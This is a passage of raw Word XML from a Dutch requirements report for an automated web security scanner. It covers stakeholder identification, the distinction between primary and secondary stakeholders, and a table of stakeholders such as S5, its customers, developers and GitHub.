    <w:p w14:paraId="5D79049C" w14:textId="02BE5BE4" w:rsidR="00FC3A1E" w:rsidRPr="00E85D96" w:rsidRDefault="00272E09" w:rsidP="00376604">
      <w:r>
        <w:t>Tabel 2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DAFF5C" w14:textId="526CC86B" w:rsidR="0054788A" w:rsidRDefault="00767E9B" w:rsidP="003462BE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc491022051"/>
      <w:r>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r w:rsidR="00FA5E1D">
        <w:t xml:space="preserve">Stakeholders en </w:t>
      </w:r>
      <w:r>
        <w:t>Business doelen</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="10E89DA8" w14:textId="77777777" w:rsidR="00B864DB" w:rsidRPr="00B864DB" w:rsidRDefault="00B864DB" w:rsidP="00B864DB"/>
    <w:p w14:paraId="4F18A7BF" w14:textId="63DDF938" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="0048146D">
      <w:r w:rsidRPr="008D1424">
        <w:t>Het is voor Stakeholders van b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">elang dat zij weten wat het nut is van een systeem. Als het niet duidelijk is waarom een systeem wordt gebouwd dan is er een grote kans dat het doeleinde ook niet volledig </w:t>
      </w:r>
      <w:r w:rsidR="00862320">
        <w:t>wordt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bereikt. De vragen die gesteld moeten worden voor het definiëren van het nut en doeleindes van een systeem zijn: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE82220" w14:textId="48A3BDB5" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="008E0AB7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wat zijn de </w:t>
      </w:r>
      <w:r w:rsidR="008365C4">
        <w:t xml:space="preserve">vastgestelde </w:t>
      </w:r>
      <w:r>
        <w:t>doelen voor het nieuwe Geautomatiseerde Web Security Scanner Systeem?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6A3BA0" w14:textId="5962D531" w:rsidR="0048146D" w:rsidRDefault="0048146D" w:rsidP="008E0AB7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Wie</w:t>
      </w:r>
      <w:r w:rsidR="0061610D">
        <w:t xml:space="preserve"> zijn de stakeholders?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC67D58" w14:textId="0580E261" w:rsidR="0061610D" w:rsidRDefault="0061610D" w:rsidP="008E0AB7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Wie is de doelgroep?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF1DD8A" w14:textId="65AB10D1" w:rsidR="000A3B05" w:rsidRDefault="0062121F" w:rsidP="000A3B05">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc491022052"/>
      <w:r>
        <w:t xml:space="preserve">2.1.1 </w:t>
      </w:r>
      <w:r w:rsidR="000A3B05">
        <w:t>Stakeholders</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="4CCC9E78" w14:textId="77777777" w:rsidR="000A3B05" w:rsidRDefault="000A3B05"/>
    <w:p w14:paraId="15B309CB" w14:textId="23C183D4" w:rsidR="00DB07D1" w:rsidRDefault="004E1F30">
      <w:r>
        <w:t xml:space="preserve">Het identificeren van stakeholders is meestal het eerste stap in het schrijven </w:t>
      </w:r>
      <w:r w:rsidR="009D574D">
        <w:t>van een Business Georiënteerde D</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ocument. </w:t>
      </w:r>
      <w:r w:rsidR="00A84A51">
        <w:t xml:space="preserve">Stakeholders zij de mensen, groepen, of instituten </w:t>
      </w:r>
      <w:r w:rsidR="00BD0B6D">
        <w:t xml:space="preserve">die beïnvloed kunnen worden door </w:t>
      </w:r>
      <w:r w:rsidR="009D574D">
        <w:t>de uitkomst van bijvoorbeeld een project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093D112E" w14:textId="5CE5B73F" w:rsidR="003E7585" w:rsidRDefault="00F16CD1">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251951104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="73B3CC8B" wp14:editId="53BAD679">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1069975</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2479040</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2718435" cy="269875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="62" name="Text Box 62"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2718435" cy="269875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="04DAE73D" w14:textId="2C5AB263" w:rsidR="00CE4BB5" w:rsidRPr="00C55423" w:rsidRDefault="00CE4BB5" w:rsidP="00F16CD1">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>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3CC8B" id="Text Box 62" o:spid="_x0000_s1036" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:84.25pt;margin-top:195.2pt;width:214.05pt;height:21.25pt;z-index:25195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Uv1TkCAAB3BAAADgAAAGRycy9lMm9Eb2MueG1srFRRb9owEH6ftP9g+X0E6EpZRKgYFdMk1FaC&#10;qc/GcYgl2+fZhoT9+p2dhG7dnqa9mPPd+bvc992xuG+1ImfhvART0MloTIkwHEppjgX9tt98mFPi&#10;AzMlU2BEQS/C0/vl+3eLxuZiCjWoUjiCIMbnjS1oHYLNs8zzWmjmR2CFwWAFTrOAV3fMSscaRNcq&#10;m47Hs6wBV1oHXHiP3ocuSJcJv6oED09V5UUgqqD4bSGdLp2HeGbLBcuPjtla8v4z2D98hWbSYNEr&#10;1AMLjJyc/ANKS+7AQxVGHHQGVSW5SD1gN5Pxm252NbMi9YLkeHulyf8/WP54fnZElgWdTSkxTKNG&#10;e9EG8hlagi7kp7E+x7SdxcTQoh91HvwenbHttnI6/mJDBOPI9OXKbkTj6JzeTeYfb24p4Ribzj7N&#10;724jTPb62jofvgjQJBoFdaheIpWdtz50qUNKLOZByXIjlYqXGFgrR84MlW5qGUQP/luWMjHXQHzV&#10;AXYekUalrxIb7hqLVmgPbSLoZmj6AOUFuXDQTZO3fCOx+pb58Mwcjg+2jysRnvCoFDQFhd6ipAb3&#10;42/+mI+qYpSSBsexoP77iTlBifpqUO84u4PhBuMwGOak14B9T3DZLE8mPnBBDWblQL/gpqxiFQwx&#10;w7FWQcNgrkO3FLhpXKxWKQkn1LKwNTvLI/TA8r59Yc72GgVU9xGGQWX5G6m63CSWXZ0C8p50jLx2&#10;LKL+8YLTnSah38S4Pr/eU9br/8XyJwAAAP//AwBQSwMEFAAGAAgAAAAhAMcS25DiAAAACwEAAA8A&#10;AABkcnMvZG93bnJldi54bWxMjzFPwzAQhXck/oN1SCyIOjSp1YQ4VVXBAEtF6MLmxtc4ENtR7LTh&#10;33NMMD7dp/e+Kzez7dkZx9B5J+FhkQBD13jduVbC4f35fg0sROW06r1DCd8YYFNdX5Wq0P7i3vBc&#10;x5ZRiQuFkmBiHArOQ2PQqrDwAzq6nfxoVaQ4tlyP6kLltufLJBHcqs7RglED7gw2X/VkJeyzj725&#10;m05Pr9ssHV8O0058trWUtzfz9hFYxDn+wfCrT+pQkdPRT04H1lMW6xWhEtI8yYARscqFAHaUkKXL&#10;HHhV8v8/VD8AAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAA&#10;AAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEADDUv1TkCAAB3BAAADgAAAAAA&#10;AAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAxxLbkOIAAAALAQAADwAA&#10;AAAAAAAAAAAAAACRBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAKAFAAAAAA==&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="04DAE73D" w14:textId="2C5AB263" w:rsidR="00CE4BB5" w:rsidRPr="00C55423" w:rsidRDefault="00CE4BB5" w:rsidP="00F16CD1">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 2.1</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251949056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17695B4E" wp14:editId="4986630A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1069975</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>394335</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2718435" cy="2049145"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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takeholders 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8435" cy="2049145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="007F0702">
        <w:t xml:space="preserve">Om de stakeholders te identificeren </w:t>
      </w:r>
      <w:r w:rsidR="00875AEA">
        <w:t>geb</w:t>
      </w:r>
      <w:r w:rsidR="003E7585">
        <w:t>ruik ik een brainstorm techniek, het resultaat ervan is geïllustreerd in figuur 2.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4B5DC5" w14:textId="3DF627C1" w:rsidR="00F67D19" w:rsidRDefault="002F1545">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C37ED">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B22B1">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F67D19">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E4376E" w14:textId="03377F06" w:rsidR="006813C6" w:rsidRDefault="006813C6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Het identificeren van stakeholders behoort to</w:t>
      </w:r>
      <w:r w:rsidR="00FB3F87">
        <w:t xml:space="preserve">t </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FB3F87">
        <w:t>één</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FB3F87">
        <w:t xml:space="preserve"> van de primaire taken voor een project. De stakeholders die niet zijn geïdentificeerd kunnen ook niet betrokken worden bij het project. </w:t>
      </w:r>
      <w:r w:rsidR="00E7696A">
        <w:t>De stakeholders bieden je ook meer inzicht op het probleem, omdat je het dan vanuit hen hoek</w:t>
      </w:r>
      <w:r w:rsidR="00525BB1">
        <w:t xml:space="preserve"> naar het probleem kunt kijken.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEC97C1" w14:textId="4AF94CD5" w:rsidR="00C5590D" w:rsidRDefault="00A63D91">
      <w:r>
        <w:t>De geï</w:t>
      </w:r>
      <w:r w:rsidR="005B6E59">
        <w:t>dentificeerde stakeholders bestaan uit twee categorieën de</w:t>
      </w:r>
      <w:r w:rsidR="002D02FE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB1DF4">
        <w:t xml:space="preserve">primaire (wit) en secondaire (Grijs) stakeholders. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EC911E" w14:textId="46F87072" w:rsidR="009C1A92" w:rsidRDefault="009C1A92" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Primaire stakeholders worden direct beïnvloed (</w:t>
      </w:r>
      <w:r w:rsidR="005A05CB">
        <w:t>positief of negatief</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0910A0A3" w14:textId="2D14387F" w:rsidR="009C1A92" w:rsidRDefault="009C1A92" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Secondaire stakeholders worden mogelijk beïnvloed door </w:t>
      </w:r>
      <w:r w:rsidR="005A05CB">
        <w:t>de primaire stakeholders (positief of negatief)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9357" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1046"/>
        <w:gridCol w:w="4650"/>
        <w:gridCol w:w="3661"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F5608B" w14:paraId="63680853" w14:textId="77777777" w:rsidTr="00F5608B">
        <w:trPr>
          <w:trHeight w:val="481"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1046" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BD4422F" w14:textId="3DE58C9E" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00EC7678" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68FBAB37" w14:textId="2A505F45" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00EC7678" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Stakeholders</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19E438E9" w14:textId="13EB7958" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00D40A9E" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Categorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F5608B" w14:paraId="224725AD" w14:textId="77777777" w:rsidTr="00F5608B">
        <w:trPr>
          <w:trHeight w:val="505"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1046" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29145582" w14:textId="4B9AE0E9" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00D40A9E" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C2131A6" w14:textId="735A7111" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00D40A9E" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>S5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="707A637A" w14:textId="151B0BCA" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00DE2E58" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Primaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F5608B" w14:paraId="22A47733" w14:textId="77777777" w:rsidTr="00F5608B">
        <w:trPr>
          <w:trHeight w:val="481"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1046" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E7D161F" w14:textId="0FB3307A" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00D40A9E" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FC6668C" w14:textId="6FB08359" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00D40A9E" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Klanten van S5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3958E70C" w14:textId="6152928C" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00DE2E58" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Primaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F5608B" w14:paraId="2AF6714B" w14:textId="77777777" w:rsidTr="00F5608B">
        <w:trPr>
          <w:trHeight w:val="505"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1046" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A7DB014" w14:textId="68576606" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00D40A9E" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62D8ACDB" w14:textId="61ABD601" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00D40A9E" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Ontwikkelaars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D6C333D" w14:textId="37CCE106" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00DE2E58" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Primaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F5608B" w14:paraId="33DCA1A8" w14:textId="77777777" w:rsidTr="00F5608B">
        <w:trPr>
          <w:trHeight w:val="481"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1046" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B6524AF" w14:textId="7BF1ECBC" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00D40A9E" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="023D30A2" w14:textId="29739ED9" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00A75059" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="007F6F47" w14:textId="49E166B1" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00DE2E58" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Primaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F5608B" w14:paraId="01460BCD" w14:textId="77777777" w:rsidTr="00C05408">
        <w:trPr>
          <w:trHeight w:val="505"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1046" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3232709C" w14:textId="0B13F278" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00D40A9E" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5416DB69" w14:textId="1F22E8B2" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00B16316" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Concurrentie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BEC3F53" w14:textId="672D6106" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00DE2E58" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Secondaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F5608B" w14:paraId="5EDF37AF" w14:textId="77777777" w:rsidTr="00C05408">
        <w:trPr>
          <w:trHeight w:val="481"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1046" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="773F773C" w14:textId="174996F9" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00D40A9E" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="58CE28BD" w14:textId="0E06BEEE" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00DE2E58" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>GitHub</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77FDCE45" w14:textId="0E9DAED3" w:rsidR="00EC7678" w:rsidRPr="00F5608B" w:rsidRDefault="00DE2E58" w:rsidP="005B1B18">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F5608B">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Secondaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F5608B" w14:paraId="42CC97BA" w14:textId="77777777" w:rsidTr="00C05408">
        <w:trPr>
          <w:trHeight w:val="1013"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1046" w:type="dxa"/>
          </w:tcPr>
